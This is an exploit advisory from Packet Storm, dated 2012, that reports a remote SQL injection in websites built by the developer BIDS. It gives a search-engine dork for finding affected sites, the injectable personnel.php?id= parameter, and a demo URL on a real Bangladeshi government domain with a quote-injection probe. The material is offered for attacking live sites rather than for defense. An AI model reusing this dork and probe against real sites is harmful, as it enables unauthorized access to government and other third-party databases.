Sites designed by BIDS appear to suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
f052a87ebf386597062ed4019081d111081360e5a9e98a705e456af329033068################################################################
----------------------------------------------------------------
BIDS SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : BIDS SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.bids.org.bd ]
# Date : 10/3/2012
# E-Mail : Bl4ck.Intell@gmail.com & Net-W0lf@att.net
# D0rK : intext:"Developed by: BIDS"
################################################################
----------------------------------------------------------------
+-----------------------+
| SQL Injection |
+-----------------------+
Expl0!T :
[TargeT]/personnel.php?id=[SQl]
D3m0:
www.mocat.gov.bd/personnel.php?id='
Greets To :
| Am!r | B3HZ4D | Packetstormsecurity.org | Exploit-db.com |
Hack-Center
===========================================# End #=============================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed